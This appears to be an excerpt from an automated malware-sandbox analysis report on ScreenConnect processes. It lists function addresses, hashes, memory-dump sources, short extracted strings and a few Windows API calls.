Opcode Fuzzy Hash: ec811c8bef405d51c4c523204e217984532790fac29e3944487fb68e72ff9589
Instruction Fuzzy Hash: 2CE04F35A00210CFC7699B34E80C4ADBBB6FF4522231590ADE80B97755CB369C52CF41

Function 016D8120 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30adf005ed5402f11f392de78189523a7ac00056eae491928636ad8e451515bd
Instruction ID: 8f5706460c82c78f9d39fa756b99a9ef68b8748e4bfbe8f8ac145bdd67fa07df
Opcode Fuzzy Hash: 30adf005ed5402f11f392de78189523a7ac00056eae491928636ad8e451515bd
Instruction Fuzzy Hash: 1BE0DF70448A809BC306DBBCEC0C08ABFA4BF47278F08059DE6808A197D7205487C752

Function 016D7FB7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0ce810f7ed6db1c8905ffef7f519f953c1a4376e838283a07c8832f73b697c
Instruction ID: eb5ef756d0e70120b906a56443154b16521e708e9e075ed00b6bf9bf5368fd2e
Opcode Fuzzy Hash: df0ce810f7ed6db1c8905ffef7f519f953c1a4376e838283a07c8832f73b697c
Instruction Fuzzy Hash: 3CE0D83448C3814FC312D774A845289BFE4DBC2224F0548DEE5818A943D279985BCF93

Function 016D0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f39e1fc42aff376d7ba180b1f988e04c225d6ed4e0a96a4b570bbd80abc23f
Instruction ID: 89c63ec590de9e4c58b2839db4a565dee9fb22e791bebeadd940ecdb1f77984c
Opcode Fuzzy Hash: 24f39e1fc42aff376d7ba180b1f988e04c225d6ed4e0a96a4b570bbd80abc23f
Instruction Fuzzy Hash: 42D01730A0120AEFCB40EFA8ED0095EBBB9EB84241B1042BDD809E7210EA316E009B81

Function 016D1E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed6cd1b29f263ca89c404061769d691e64d2f6d29e05b03d4ac4402b42fe3398
Instruction ID: 3e021eebed89d919d834d280182a6703d8fb6207aae211ec1234f7016961de4a
Opcode Fuzzy Hash: ed6cd1b29f263ca89c404061769d691e64d2f6d29e05b03d4ac4402b42fe3398
Instruction Fuzzy Hash: 5BD0123191110DFFCB40DFB4E94555DB7F9FB84204B2041A9D509D7250DA315F049F90

Analysis Process: ScreenConnect.ClientService.exePID: 1012, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	7

Executed Functions

Function 042DA450 Relevance: 4.2, Strings: 3, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`q, xrefs: 042DA624
Hbq, xrefs: 042DA9AA
d, xrefs: 042DA608

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 0`q$Hbq$d
API String ID: 0-3445523350
Opcode ID: 88f870a2744f31e58c676994aa05ff32183f87370e86846b1c676dcc7ef55e70
Instruction ID: 6a239ac9ce314af1a01402b84ea477a19acf53ccb2a80bfc515d37391c85fa55
Opcode Fuzzy Hash: 88f870a2744f31e58c676994aa05ff32183f87370e86846b1c676dcc7ef55e70
Instruction Fuzzy Hash: 19127B70B106069FDB14CF69C580A6AFBB6FF88314B158629E85AD7795DB30FC42CB90

Function 00BEC67F Relevance: 2.8, Strings: 2, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00BEC84D
$^q, xrefs: 00BEC841

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 7e67b9a99b5939aa6ab6714aa6b4fc09b654b00ec0a2d1109324c8a4074ac6bb
Instruction ID: 2639450726c7263aa0547b7d5e638de306a65fd74c0f824390bdbf8dbd86cb0b
Opcode Fuzzy Hash: 7e67b9a99b5939aa6ab6714aa6b4fc09b654b00ec0a2d1109324c8a4074ac6bb
Instruction Fuzzy Hash: 38B16030A00359CFCB15EFA9C494AADBBF1FF85304F1086A9D455AB3A5DB70D986CB81

Function 00BEEF78 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 00BEF1C8
(&^q, xrefs: 00BEF0A9

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: 7c8613d1a837e92c71e276a98f27c4804465eaf665bf5d1754582c2042015bf6
Instruction ID: 6fb228c81d39de91ed1c5165366781f72fb3518b74595b09f7a02d9dd1224353
Opcode Fuzzy Hash: 7c8613d1a837e92c71e276a98f27c4804465eaf665bf5d1754582c2042015bf6
Instruction Fuzzy Hash: 99618131F002598BDB14EFB9C4506AEBAE6EFC4740F248569D406BB385DF34AD428B96

Function 00BE4C62 Relevance: 2.6, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Q^q, xrefs: 00BE4DEB
`Q^q, xrefs: 00BE4C86

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: `Q^q$`Q^q
API String ID: 0-4048626156
Opcode ID: f3343856b03f4057bd61af7150eda204589c1e034d6a33c02e98378f8ed404dd
Instruction ID: 734153784111be3be67b9019e147b912514a5201b5ec8d85b98bc76f062a6950
Opcode Fuzzy Hash: f3343856b03f4057bd61af7150eda204589c1e034d6a33c02e98378f8ed404dd
Instruction Fuzzy Hash: 5241AC71E002689FDB10EF69DC047AEBBB5FB44310F0085E9D509AB290DB745E85CF92

Function 00BE5410 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00BE5425
$^q, xrefs: 00BE5431

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 330b19a5a54852a2933fc85776de9fa3a062656cc01baf43376a90479784a927
Instruction ID: 59210711abfff0a6fa164cd2f8f68c43aa782a265b048bc5f108ec7d2f1fa4c8
Opcode Fuzzy Hash: 330b19a5a54852a2933fc85776de9fa3a062656cc01baf43376a90479784a927
Instruction Fuzzy Hash: 59D05E3074060C8F8738CE2AD54491133F8BB45B0636104E9D9068F3B9CF21EC81C651

Function 056D4708 Relevance: 1.7, APIs: 1, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3520189139.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_56d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f001ec9779885919a5f09a6993f09dba08229ead3e105aef3653ba3e995228a2
Instruction ID: 7e68fd03715b3db6a488e355e1944fc0cf899e00258932c94fd0932aa196718d
Opcode Fuzzy Hash: f001ec9779885919a5f09a6993f09dba08229ead3e105aef3653ba3e995228a2
Instruction Fuzzy Hash: C061AD71E006458FCB24CFA9D8846AEFBF1FB88310F14892ED06AD7651DB74E845CBA1

Function 056D27C4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 056D48BD

Memory Dump Source

Source File: 00000008.00000002.3520189139.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_56d0000_ScreenConnect.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c7c0b7f08888789cecfff0a1896f2583b1e25d4e2d7b9775016334461941c5a8
Instruction ID: c80d5bc57d4cc340eca572980627e2b2127e0eb1922ccb761fa3de298cfd4b24
Opcode Fuzzy Hash: c7c0b7f08888789cecfff0a1896f2583b1e25d4e2d7b9775016334461941c5a8
Instruction Fuzzy Hash: E12125B1D002599FDB10CF9AD885ADEFBF4FB48360F10842EE559A7300C779A941CBA4

Function 00BEFB40 Relevance: 1.6, Strings: 1, Instructions: 314
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00BEFB83

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 497492a9730ffc264af6ebf69647c800ca60497d639b850652201fcca2e57b86
Instruction ID: 45c2f17332fb271f19d25110f638bd0555bc6ca2dabe166117d93dfbe11660db
Opcode Fuzzy Hash: 497492a9730ffc264af6ebf69647c800ca60497d639b850652201fcca2e57b86
Instruction Fuzzy Hash: F1D15075A40705CFCB04DF68D994A9AB7F5FF49310B1086A9E809AB3A5DB30EC85CF90

Function 056D4938 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056D499E

Memory Dump Source

Source File: 00000008.00000002.3520189139.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_56d0000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: e0eec339d2822e3f6087194666f603c8dac0a8fb445ab04f21212782cde3a93b
Instruction ID: ba0f9e974deb7414d0cf60ccd0fd86a8f5a393f2831427cfbde5da8be11a1c6d
Opcode Fuzzy Hash: e0eec339d2822e3f6087194666f603c8dac0a8fb445ab04f21212782cde3a93b
Instruction Fuzzy Hash: 4A1114B2C002598FCB10DF9AD445BDEFBF4FB48324F14842AD859A7250C778A945CFA5

Function 056D27B8 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056D499E

Memory Dump Source

Source File: 00000008.00000002.3520189139.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_56d0000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: b0b5834b7cbe1b06e1f1798ce814449859525bd28373529ca048bd053752803b
Instruction ID: 17237742b7b137eded9d2fa11ea6deea3f1df874f638b863571d77d9ed0642a0
Opcode Fuzzy Hash: b0b5834b7cbe1b06e1f1798ce814449859525bd28373529ca048bd053752803b
Instruction Fuzzy Hash: 821112B1C002598FCB20DF9AD444BEEFBF4FB88320F10846AD859A7250D778A945CFA5

Function 00BE8D98 Relevance: 1.4, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 00BE8DBA

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 60570c0c7a0a6b1a6343cf5967c01aa9fde9b78c8964dc31435476ffb432d22d
Instruction ID: 08b3b18384aa5d29f077abddcb634cd79e5c6a2fecf5f326daadff8a1566423f
Opcode Fuzzy Hash: 60570c0c7a0a6b1a6343cf5967c01aa9fde9b78c8964dc31435476ffb432d22d
Instruction Fuzzy Hash: 00611A34B10A198FCB14DFA9D99496EB7F2FF8D314B1181A4E50AAB365DB30EC01DB80

Function 00BEAAA0 Relevance: 1.4, Strings: 1, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 00BEAC2B

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: fbf25a47c6918dfc2d3498ddee783af60735788d0446be305beb7bb0c97c3851
Instruction ID: 8a7a5ea778165064e53f382a9441fcbe8e3f0596dde58b885405eb385613332c
Opcode Fuzzy Hash: fbf25a47c6918dfc2d3498ddee783af60735788d0446be305beb7bb0c97c3851
Instruction Fuzzy Hash: 7E51E530B002509FCB25DB79D854B6EBBE6FF84704F1485AAE856DB391DB30AC45CB42

Function 00BE5DF0 Relevance: 1.4, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nCvq, xrefs: 00BE5ED1

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: 55cac68360a4644888488aaff6a4c964c362b1e8113c6444925f0d25c4cae204
Instruction ID: 50289caed34b885ea7b0382b903b8306acb28dea86add42153e80de6f9221643
Opcode Fuzzy Hash: 55cac68360a4644888488aaff6a4c964c362b1e8113c6444925f0d25c4cae204
Instruction Fuzzy Hash: B551A4317006458FCB24EB7AD955A6EB7E6EF88314B1084B8E406DB3A1EF70DD01CB91

Function 00BEC6F0 Relevance: 1.4, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00BEC841

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 1baa95a530361f0325e71bcfc659e04a3fe5b42693a7c409b1257c1110f461d8
Instruction ID: a8de86289737f481bf0b87691decd3dd820a06b7ac2fd00633c118c3c1737dc9
Opcode Fuzzy Hash: 1baa95a530361f0325e71bcfc659e04a3fe5b42693a7c409b1257c1110f461d8
Instruction Fuzzy Hash: EC515930A00349CFCB14EFA5C498AADBBF1FF45304F1199A9D456AB365EB709D86CB80

Function 00BE5DE0 Relevance: 1.4, Strings: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nCvq, xrefs: 00BE5ED1

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: 0808a30d0c488576b506ef8835937b359ebb60345dcb3bd92b02a577bd54d681
Instruction ID: c5a0c26aa3d38c25fec3530af1960a060d250fd2a00c4302a55cfc99b9400a15
Opcode Fuzzy Hash: 0808a30d0c488576b506ef8835937b359ebb60345dcb3bd92b02a577bd54d681
Instruction Fuzzy Hash: 5C5193307006468FCB24EB7AD955A6E77E2EF88304B1484B8E406DB3A5EF74DD02CB91

Function 00BE7E50 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 00BE7E71

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 8b81b894891c72bab6709dc08abb88661f8be85e8a7103809b69839bece99990
Instruction ID: 51737bda3dfef4f37cfe06344fe997fc543c71388827543ae26e69741a84af91
Opcode Fuzzy Hash: 8b81b894891c72bab6709dc08abb88661f8be85e8a7103809b69839bece99990
Instruction Fuzzy Hash: 8D41D131A40105CBCB14EFA9D994AADBBA6EF84311F14C1A5D9069B356DF34EC06CBD0

Function 00BE6FE8 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

(, xrefs: 00BE70FE

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: c67f45f194b9ae74c4b58c52c0f813c4249c766efa9e626bc45a01aad8a657b0
Instruction ID: 2ca6b8e07fcf3508357bbadb989ad35b79fd9005785f44d1a4d5eb9d85f9e9a4
Opcode Fuzzy Hash: c67f45f194b9ae74c4b58c52c0f813c4249c766efa9e626bc45a01aad8a657b0
Instruction Fuzzy Hash: 0B410F32B002414FCB01EB7AE99256EBBE2EB9535030586BAD416DB346EF30DD55CBD1

Function 042DCBF9 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

>~n^, xrefs: 042DCCBE

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: >~n^
API String ID: 0-811120985
Opcode ID: 82989d4dac0d0e7c78483d3bae1afed0c49ddbcff7bbbd27165cad3f4b914d98
Instruction ID: a1b9b0543d6158580b031f67b56c82c32520fa6afb0ab608a23865a2910b0a1e
Opcode Fuzzy Hash: 82989d4dac0d0e7c78483d3bae1afed0c49ddbcff7bbbd27165cad3f4b914d98
Instruction Fuzzy Hash: 4D514C31B1070A8BDB159F75C894799B7B6FF88304F1085A9D54AA7352EF70EE86CB80

Function 00BEAC10 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00BEAC2B

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 520181a0ff0a763dd862c791a2139280ee163e1a6784a6c395c8ae9cb208dc95
Instruction ID: be61e620e5c43e768c17651f23d8b0e2462f728dc213dee4039b218f7b31479c
Opcode Fuzzy Hash: 520181a0ff0a763dd862c791a2139280ee163e1a6784a6c395c8ae9cb208dc95
Instruction Fuzzy Hash: 9A411030A101559BDB18DFA6DC98ABE7BFAFF88701F108169E406A77A0DF74AC41CB45

Function 042DCC08 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

>~n^, xrefs: 042DCCBE

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: >~n^
API String ID: 0-811120985
Opcode ID: 22c867598e2b9d511fe4cc02c3031b50c249221fc26e9ce082444491b0a6acd6
Instruction ID: 03039452640ec630352a9e86ac7cdd614553a579d5dc5ac23fa5eed1b1d40525
Opcode Fuzzy Hash: 22c867598e2b9d511fe4cc02c3031b50c249221fc26e9ce082444491b0a6acd6
Instruction Fuzzy Hash: E5413B31B1070A8BDB149F75C894B99B7B6FF84300F108569E54AA7352EF70EE86CB80

Function 00BE6FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 00BE70FE

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: c56852ccf1f598322c20bda6fdef526d32b04006bca06ee558cecde39a6e0a57
Instruction ID: bb5f499addc5b7f9ce3856ef1cb7eba1f4980281ab55cd47b23ebffd5d94c1df
Opcode Fuzzy Hash: c56852ccf1f598322c20bda6fdef526d32b04006bca06ee558cecde39a6e0a57
Instruction Fuzzy Hash: C331D072B402055F8B00EB7E994156EB7E6EFC83507008579E81ADB344EF70EE158BD1

Function 00BEE4F9 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00BEE534

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: c1070922582d9212b4c883d150aacce89eb0985f2a30d7fc5ff85f0ec6339fe3
Instruction ID: b6f293e5a801fb4ecc2982f45e8f41ca0b43de90413fec2d5fba35688967ed6f
Opcode Fuzzy Hash: c1070922582d9212b4c883d150aacce89eb0985f2a30d7fc5ff85f0ec6339fe3
Instruction Fuzzy Hash: 00219131B001449BDB18DBA5C899ABE7BF6ABD8704F14856DE402A7291EFB0DC42CB55

Function 042D7792 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

$, xrefs: 042D77D4

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-1178188002
Opcode ID: af43b656dd298013e489531dca0ad28fd2311cd3c8fc69b72a4c13f9e8ffcf29
Instruction ID: 69baebdcd9b1253b8ded0458bcd820f48467dde9d406ac6a15fd4241b398dd63
Opcode Fuzzy Hash: af43b656dd298013e489531dca0ad28fd2311cd3c8fc69b72a4c13f9e8ffcf29
Instruction Fuzzy Hash: 1EF0C2B6B400018FAF00DEACE99469EF7A5DFC8354310847BE109DB358DA35EC558B90

Function 042D768F Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

#", xrefs: 042D76CD

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #"
API String ID: 0-2415436313
Opcode ID: 2aa936abe797f24075b8c6833abd46d7b9a943be1aab73422383de2dc55e1411
Instruction ID: ec11d1a897d8a56db06e931261c1679bd9ab95d75ac21e041ace3d7aa8902fe9
Opcode Fuzzy Hash: 2aa936abe797f24075b8c6833abd46d7b9a943be1aab73422383de2dc55e1411
Instruction Fuzzy Hash: 9AF0E5723002016B9704A769E98189EFB96EAC1364304C539E21E9F324DF70FD8A8BD0

Function 042D7690 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

#", xrefs: 042D76CD

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #"
API String ID: 0-2415436313
Opcode ID: 246a6912be27e0de84470bb4e01c333e55cdc808016b31b3cfc3bb8476e5a021
Instruction ID: c59a5202be12ba6028a302880167426ef50e8b3155e035b3b5b40a2bf123cd52
Opcode Fuzzy Hash: 246a6912be27e0de84470bb4e01c333e55cdc808016b31b3cfc3bb8476e5a021
Instruction Fuzzy Hash: 67F0E5723002016B9704A769E98189EFB9AEAC1364344C539E21E9B324DF70FD898BD4

Function 00BE5400 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

$^q, xrefs: 00BE5425

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 6f3c428374edcae3d9664e1e65a78a7d71423dbc61c2fb01ca04eebb9a9ecc79
Instruction ID: 82e1d850221739ad7ec9a7e49da667ad101052566b09a1fd576626b7da02916c
Opcode Fuzzy Hash: 6f3c428374edcae3d9664e1e65a78a7d71423dbc61c2fb01ca04eebb9a9ecc79
Instruction Fuzzy Hash: 50E0C230548A448FCB38CF64D910B5533F8BF55707B1545F6D808CB7B5D721C881CA40

Function 042DEE20 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36bf30cb1b2be711852a980be99fbb9f72a0375ec1c9bfa3f38287f7b736471
Instruction ID: 93416a891cdc0bfe5722e594de1859db1fd24f0c012a9daf620a4cec25a25648
Opcode Fuzzy Hash: c36bf30cb1b2be711852a980be99fbb9f72a0375ec1c9bfa3f38287f7b736471
Instruction Fuzzy Hash: 6F227E31B102158FDB14EF78C950B5EBBB2EF89304F118599D90AAB395DB70ED82CB91

Function 00BED078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad18c0b6cdd44888b34f3992c61ba2bc10736c61a378ec5cc5ab9b5bccafa35
Instruction ID: 0ae0091b07f2ccf2e2ed0bd8f1043fcb5c49fb69aede1c284a6c7d76529f3ef4
Opcode Fuzzy Hash: aad18c0b6cdd44888b34f3992c61ba2bc10736c61a378ec5cc5ab9b5bccafa35
Instruction Fuzzy Hash: 90A10974B402098FCB14DFA9C594AADBBF2EF88300F1485A9E406AB3A5DB75ED41CF51

Function 00BED069 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63332414127608c035162257555b88dacce7c3e9bce308cb460047da6c58e98
Instruction ID: 154bd7dcf2e1990d8e08456d6956b0d374cab552d5fbef485bcc0af421dea786
Opcode Fuzzy Hash: c63332414127608c035162257555b88dacce7c3e9bce308cb460047da6c58e98
Instruction Fuzzy Hash: F4A10974B402098FCB14DFA9C594AADBBF2EF89300B1485A9E406EB365DB75ED41CF50

